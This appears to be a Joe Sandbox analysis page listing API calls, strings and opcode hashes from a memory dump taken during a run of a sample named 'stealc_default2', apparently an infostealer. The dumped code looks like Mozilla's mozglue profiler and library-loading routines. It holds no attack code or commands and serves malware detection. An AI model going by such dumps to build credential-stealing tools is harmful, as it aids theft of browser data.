Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: 60356d39bd46498cd30f4f1c09308f0b171537d9f70af1718cfe99cd0ac3e6ba
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: F4B1E672E0011ACFDB14CF58CC907ADB7B2AF84318F15026AC949EB785D730A989CB90

Function 6C1350C7 Relevance: 6.5, APIs: 5, Instructions: 280COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,80808082), ref: 6C138E18
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C13925C

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction ID: 5a77f2499855380d969ea7a6879638741e53cb39121f2bd1649efdaa0e1461f8
Opcode Fuzzy Hash: 8a04f876341ba59a6ddb8d2d2d5789db075aee54b4cc3de998e3f034435ba008
Instruction Fuzzy Hash: C6A1D772E001268FDB14CF68CC90799B7B2AF95318F1542BAC94DEB785D730A999CB90

Function 6C1177A0 Relevance: 6.3, APIs: 4, Instructions: 291timeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C117A81
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C117A93

Part of subcall function 6C0E5C50: GetTickCount64.KERNEL32 ref: 6C0E5D40
Part of subcall function 6C0E5C50: EnterCriticalSection.KERNEL32(6C14F688), ref: 6C0E5D67

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C117AA1

Part of subcall function 6C0E5C50: __aulldiv.LIBCMT ref: 6C0E5DB4
Part of subcall function 6C0E5C50: LeaveCriticalSection.KERNEL32(6C14F688), ref: 6C0E5DED

?ToSeconds@BaseTimeDurationPlatformUtils@mozilla@@SAN_J@Z.MOZGLUE(FFFFFFFE,?,?,?), ref: 6C117B31

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Time$CriticalSectionStampV01@@Value@mozilla@@$BaseCount64DurationEnterLeaveNow@PlatformSeconds@Stamp@mozilla@@TickUtils@mozilla@@V12@___aulldiv
String ID:
API String ID: 4054851604-0
Opcode ID: 8a4483fb75fbe731d9c463ebedc02f235680249867803a74c93370f7365acb7d
Instruction ID: 69c0856cddc9dc0ee1bedeccf507eb4c3e082ad8b0d15e2049bf86996f0f2314
Opcode Fuzzy Hash: 8a4483fb75fbe731d9c463ebedc02f235680249867803a74c93370f7365acb7d
Instruction Fuzzy Hash: 28B18E3560C3818BCB14CF24D45079FB7E2AFC9318F154A2DE99567B91DB78E90ACB82

Function 6C12B700 Relevance: 4.5, APIs: 3, Instructions: 41nativeCOMMON

Download Yara Rule

APIs

NtQueryVirtualMemory.NTDLL(000000FF,00000000,00000000,?,0000001C,6C0FFE3F), ref: 6C12B720
RtlNtStatusToDosError.NTDLL ref: 6C12B75A
RtlSetLastWin32Error.NTDLL(00000000,00000000,00000000,00000000,?,?,00000000,?,6C0FFE3F), ref: 6C12B760

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: Error$LastMemoryQueryStatusVirtualWin32
String ID:
API String ID: 304294125-0
Opcode ID: 535779605aa356c30451102730cdd2f7334823fdd33808d6bc0bc1c618b4f17a
Instruction ID: fb47ab3c2d77ed7eade3822704debf77c8c320986ff6df78de707ae9d760f21e
Opcode Fuzzy Hash: 535779605aa356c30451102730cdd2f7334823fdd33808d6bc0bc1c618b4f17a
Instruction Fuzzy Hash: 4AF0AFB0A4421CAEEF019AA5CC84BEEB7BCDB0431DF106229E516625C0D77CA5C8DA60

Function 6C12B8C0 Relevance: 3.1, APIs: 2, Instructions: 118nativeCOMMON

Download Yara Rule

APIs

rand_s.API-MS-WIN-CRT-UTILITY-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C0D03D4,?), ref: 6C12B955
NtQueryVirtualMemory.NTDLL(00000000,?,00000000,?,0000001C,0000001C), ref: 6C12B9A5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: MemoryQueryVirtualrand_s
String ID:
API String ID: 1889792194-0
Opcode ID: 43a07b8b276b61dc84603a48876d136d10099cc7fbae3b7f9a5630b7af9acc03
Instruction ID: 8288aa5394edb2ee85f777bb00af85991e6eda1fdb4a52c55a72f76ecf137536
Opcode Fuzzy Hash: 43a07b8b276b61dc84603a48876d136d10099cc7fbae3b7f9a5630b7af9acc03
Instruction Fuzzy Hash: 8441E875F01219DFDF04CFA8D890ADEB7B6EF88318F148129E916A7704DB34A9858B90

Function 6C1255F0 Relevance: 77.2, APIs: 22, Strings: 22, Instructions: 163libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(user32,?,6C0FE1A5), ref: 6C125606
LoadLibraryW.KERNEL32(gdi32,?,6C0FE1A5), ref: 6C12560F
GetProcAddress.KERNEL32(00000000,GetThreadDpiAwarenessContext), ref: 6C125633
GetProcAddress.KERNEL32(00000000,AreDpiAwarenessContextsEqual), ref: 6C12563D
GetProcAddress.KERNEL32(00000000,EnableNonClientDpiScaling), ref: 6C12566C
GetProcAddress.KERNEL32(00000000,GetSystemMetricsForDpi), ref: 6C12567D
GetProcAddress.KERNEL32(00000000,GetDpiForWindow), ref: 6C125696
GetProcAddress.KERNEL32(00000000,RegisterClassW), ref: 6C1256B2
GetProcAddress.KERNEL32(00000000,CreateWindowExW), ref: 6C1256CB
GetProcAddress.KERNEL32(00000000,ShowWindow), ref: 6C1256E4
GetProcAddress.KERNEL32(00000000,SetWindowPos), ref: 6C1256FD
GetProcAddress.KERNEL32(00000000,GetWindowDC), ref: 6C125716
GetProcAddress.KERNEL32(00000000,FillRect), ref: 6C12572F
GetProcAddress.KERNEL32(00000000,ReleaseDC), ref: 6C125748
GetProcAddress.KERNEL32(00000000,LoadIconW), ref: 6C125761
GetProcAddress.KERNEL32(00000000,LoadCursorW), ref: 6C12577A
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 6C125793
GetProcAddress.KERNEL32(00000000,GetMonitorInfoW), ref: 6C1257A8
GetProcAddress.KERNEL32(00000000,SetWindowLongPtrW), ref: 6C1257BD
GetProcAddress.KERNEL32(?,StretchDIBits), ref: 6C1257D5
GetProcAddress.KERNEL32(?,CreateSolidBrush), ref: 6C1257EA
GetProcAddress.KERNEL32(?,DeleteObject), ref: 6C1257FF

Strings

GetMonitorInfoW, xrefs: 6C1257A2
user32, xrefs: 6C125601
GetSystemMetricsForDpi, xrefs: 6C125677
GetWindowDC, xrefs: 6C125710
StretchDIBits, xrefs: 6C1257CC
CreateWindowExW, xrefs: 6C1256C5
GetDpiForWindow, xrefs: 6C125690
LoadCursorW, xrefs: 6C125774
SetWindowLongPtrW, xrefs: 6C1257B7
EnableNonClientDpiScaling, xrefs: 6C125666
LoadIconW, xrefs: 6C12575B
SetWindowPos, xrefs: 6C1256F7
GetThreadDpiAwarenessContext, xrefs: 6C12562D
FillRect, xrefs: 6C125729
MonitorFromWindow, xrefs: 6C12578D
gdi32, xrefs: 6C12560A
ShowWindow, xrefs: 6C1256DE
CreateSolidBrush, xrefs: 6C1257E4
ReleaseDC, xrefs: 6C125742
AreDpiAwarenessContextsEqual, xrefs: 6C125637
RegisterClassW, xrefs: 6C1256AC
DeleteObject, xrefs: 6C1257F9

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: AreDpiAwarenessContextsEqual$CreateSolidBrush$CreateWindowExW$DeleteObject$EnableNonClientDpiScaling$FillRect$GetDpiForWindow$GetMonitorInfoW$GetSystemMetricsForDpi$GetThreadDpiAwarenessContext$GetWindowDC$LoadCursorW$LoadIconW$MonitorFromWindow$RegisterClassW$ReleaseDC$SetWindowLongPtrW$SetWindowPos$ShowWindow$StretchDIBits$gdi32$user32
API String ID: 2238633743-1964193996
Opcode ID: 77f4d638f036c3daafa59d635ebc36883c1ac5c076183427eca7373979df73d5
Instruction ID: 4ab8e84669a1de3fb62e7c1fb8d5c56fb3fd39f2608a501d255a6aba54844375
Opcode Fuzzy Hash: 77f4d638f036c3daafa59d635ebc36883c1ac5c076183427eca7373979df73d5
Instruction Fuzzy Hash: 925145747017139BDB01AF3A8D48D2A3AF8EB5724D750C429E925F6B45EB78C850DF60

Function 6C10CC00 Relevance: 73.7, APIs: 25, Strings: 24, Instructions: 233stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,default,?,6C0D582D), ref: 6C10CC27
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,java,?,?,?,6C0D582D), ref: 6C10CC3D
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,6C13FE98,?,?,?,?,?,6C0D582D), ref: 6C10CC56
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,leaf,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC6C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C0D582D), ref: 6C10CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C10CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C10CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C10CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C10CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C10CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C10CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C10CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C10CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C10CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C10CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C10CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C10CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C10CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C10CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C10CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C10CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C10CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C10CE8A

Strings

preferencereads, xrefs: 6C10CD92
cpuallthreads, xrefs: 6C10CE16
audiocallbacktracing, xrefs: 6C10CDD4
power, xrefs: 6C10CE84
fileio, xrefs: 6C10CC92
markersallthreads, xrefs: 6C10CE42
java, xrefs: 6C10CC37
nostacksampling, xrefs: 6C10CD7C
seqstyle, xrefs: 6C10CCE6
jsallocations, xrefs: 6C10CD0E
mainthreadio, xrefs: 6C10CC7C
processcpu, xrefs: 6C10CE6E
samplingallthreads, xrefs: 6C10CE2C
default, xrefs: 6C10CC21
leaf, xrefs: 6C10CC66
ipcmessages, xrefs: 6C10CDBE
unregisteredthreads, xrefs: 6C10CE58
noiostacks, xrefs: 6C10CCBE
Unrecognized feature "%s"., xrefs: 6C10CEA0
nativeallocations, xrefs: 6C10CDA8
notimerresolutionchange, xrefs: 6C10CE00
screenshots, xrefs: 6C10CCD4
fileioall, xrefs: 6C10CCA8
stackwalk, xrefs: 6C10CCF8

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 781712a0c1f08bcded26f13e172bf3cb243f3f59d9949fb145353b06f0be6dac
Instruction ID: 2adfda5b1c85b689893649e24579d1f57bd2225a550731f3fe52caeef4444817
Opcode Fuzzy Hash: 781712a0c1f08bcded26f13e172bf3cb243f3f59d9949fb145353b06f0be6dac
Instruction Fuzzy Hash: 185173E2B4523552FA0031156D34BAA140AEB7325EF10953AED1DA5F80FF08A60ACFF7

Function 6C0D47C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C0D4801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C0D4817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C0D482D
__Init_thread_footer.LIBCMT ref: 6C0D484A

Part of subcall function 6C0FAB3F: EnterCriticalSection.KERNEL32(6C14E370,?,?,6C0C3527,6C14F6CC,?,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB49
Part of subcall function 6C0FAB3F: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C3527,6C14F6CC,?,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FAB7C

GetCurrentThreadId.KERNEL32 ref: 6C0D485F
GetCurrentThreadId.KERNEL32 ref: 6C0D487E
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0D488B
free.MOZGLUE(?), ref: 6C0D493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D4956
free.MOZGLUE(00000000), ref: 6C0D4960
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C0D499A

Part of subcall function 6C0FAB89: EnterCriticalSection.KERNEL32(6C14E370,?,?,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284), ref: 6C0FAB94
Part of subcall function 6C0FAB89: LeaveCriticalSection.KERNEL32(6C14E370,?,6C0C34DE,6C14F6CC,?,?,?,?,?,?,?,6C0C3284,?,?,6C0E56F6), ref: 6C0FABD1

free.MOZGLUE(?), ref: 6C0D49C6
free.MOZGLUE(?), ref: 6C0D49E9

Part of subcall function 6C0E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C0E5EDB
Part of subcall function 6C0E5E90: memset.VCRUNTIME140(6C127765,000000E5,55CCCCCC), ref: 6C0E5F27
Part of subcall function 6C0E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C0E5FB2

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C0D4812
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C0D47FC
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C0D4828
[I %d/%d] profiler_shutdown, xrefs: 6C0D4A06
MOZ_PROFILER_SHUTDOWN, xrefs: 6C0D4A42

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: d4e78b429dc6c716f3b21f24b5ed92f67965b4b954f5ae012065d5a01c6dab64
Instruction ID: 66fdfd80b5c1df693bfa76e42d71a26c76f3e64995fa5a1ce83a298bc0bf1aa8
Opcode Fuzzy Hash: d4e78b429dc6c716f3b21f24b5ed92f67965b4b954f5ae012065d5a01c6dab64
Instruction Fuzzy Hash: 0F813674A00200AFDB10EFACC89475E73F1AF4232CF1A4665D92697B41EB31F855CB96

Function 6C0D19A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C14F760), ref: 6C0D19BD
GetCurrentProcess.KERNEL32 ref: 6C0D19E5
GetLastError.KERNEL32 ref: 6C0D1A27
moz_xmalloc.MOZGLUE(?), ref: 6C0D1A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D1A4F
GetLastError.KERNEL32 ref: 6C0D1A92
moz_xmalloc.MOZGLUE(?), ref: 6C0D1AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C0D1ABA
LocalFree.KERNEL32(?), ref: 6C0D1C69
free.MOZGLUE(?), ref: 6C0D1C8F
free.MOZGLUE(?), ref: 6C0D1C9D
CloseHandle.KERNEL32(?), ref: 6C0D1CAE
ReleaseSRWLockExclusive.KERNEL32(6C14F760), ref: 6C0D1D52
GetLastError.KERNEL32 ref: 6C0D1DA5
GetLastError.KERNEL32 ref: 6C0D1DFB
GetLastError.KERNEL32 ref: 6C0D1E49
GetLastError.KERNEL32 ref: 6C0D1E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C0D1E9B

Part of subcall function 6C0D2070: LoadLibraryW.KERNEL32(combase.dll,6C0D1C5F), ref: 6C0D20AE
Part of subcall function 6C0D2070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C0D20CD
Part of subcall function 6C0D2070: __Init_thread_footer.LIBCMT ref: 6C0D20E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C0D1F15
VerSetConditionMask.NTDLL ref: 6C0D1F46
VerSetConditionMask.NTDLL ref: 6C0D1F52
VerSetConditionMask.NTDLL ref: 6C0D1F59
VerSetConditionMask.NTDLL ref: 6C0D1F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C0D1F6D

Strings

D, xrefs: 6C0D1B57

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 7a4096f16810d8d4701953440f7037b101c08fe454c361ddbdb6124f4f449f9e
Instruction ID: 14fc95e26f381e1c3634523db6b493cce24d56eaf78a64afcb470b4e2dbc97f2
Opcode Fuzzy Hash: 7a4096f16810d8d4701953440f7037b101c08fe454c361ddbdb6124f4f449f9e
Instruction Fuzzy Hash: 1AF18371A00725AFEB209F65CC48B9AB7F4FF49718F114199E909A7640EB74EE80CF90

Function 6C0D4470 Relevance: 43.9, APIs: 20, Strings: 5, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C0D4730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C0D44B2,6C14E21C,6C14F7F8), ref: 6C0D473E
Part of subcall function 6C0D4730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C0D474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C0D44BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C0D44D2
InitOnceExecuteOnce.KERNEL32(6C14F80C,6C0CF240,?,?), ref: 6C0D451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C0D455C
LoadLibraryW.KERNEL32(?), ref: 6C0D4592
InitializeCriticalSection.KERNEL32(6C14F770), ref: 6C0D45A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C0D45AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C0D45BB
InitOnceExecuteOnce.KERNEL32(6C14F818,6C0CF240,?,?), ref: 6C0D4612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C0D4636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C0D4644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C0D466D
VerSetConditionMask.NTDLL ref: 6C0D469F
VerSetConditionMask.NTDLL ref: 6C0D46AB
VerSetConditionMask.NTDLL ref: 6C0D46B2
VerSetConditionMask.NTDLL ref: 6C0D46B9
VerSetConditionMask.NTDLL ref: 6C0D46C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C0D46CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C0D46F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C0D46FD

Strings

NativeNtBlockSet_Write, xrefs: 6C0D46F7
kernel32.dll, xrefs: 6C0D44CD
l, xrefs: 6C0D4578
user32.dll, xrefs: 6C0D4557, 6C0D463F
WRusr.dll, xrefs: 6C0D44B5

Memory Dump Source

Source File: 00000007.00000002.3148620550.000000006C0C1000.00000020.00000001.01000000.00000019.sdmp, Offset: 6C0C0000, based on PE: true

Associated: 00000007.00000002.3148588584.000000006C0C0000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148820583.000000006C13D000.00000002.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148858940.000000006C14E000.00000004.00000001.01000000.00000019.sdmpDownload File
Associated: 00000007.00000002.3148885228.000000006C152000.00000002.00000001.01000000.00000019.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_6c0c0000_stealc_default2.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-3894940629
Opcode ID: 47c7ec4f8b8adebfb18b617fe35610a8479fa6479e321e93dd316c24ccb98264
Instruction ID: 805d6e4f3422557c44fd0acd11c88f6b5a589b8ff91a610043a4836aefa6e609
Opcode Fuzzy Hash: 47c7ec4f8b8adebfb18b617fe35610a8479fa6479e321e93dd316c24ccb98264
Instruction Fuzzy Hash: 916104B0A04344AFEB10AFA0C849F997BF8EF4630CF05C558E518AB741D7B4AA44CF61

Function 6C10E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C107090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C10B9F1,?), ref: 6C107107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C10DCF5), ref: 6C10E92D
GetCurrentThreadId.KERNEL32 ref: 6C10EA4F
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EA5C
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EA80
GetCurrentThreadId.KERNEL32 ref: 6C10EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C10DCF5), ref: 6C10EA92
GetCurrentThreadId.KERNEL32 ref: 6C10EB11
AcquireSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C10EB3C
ReleaseSRWLockExclusive.KERNEL32(6C14F4B8), ref: 6C10EB5B

Part of subcall function 6C105710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C10EB71), ref: 6C1057AB

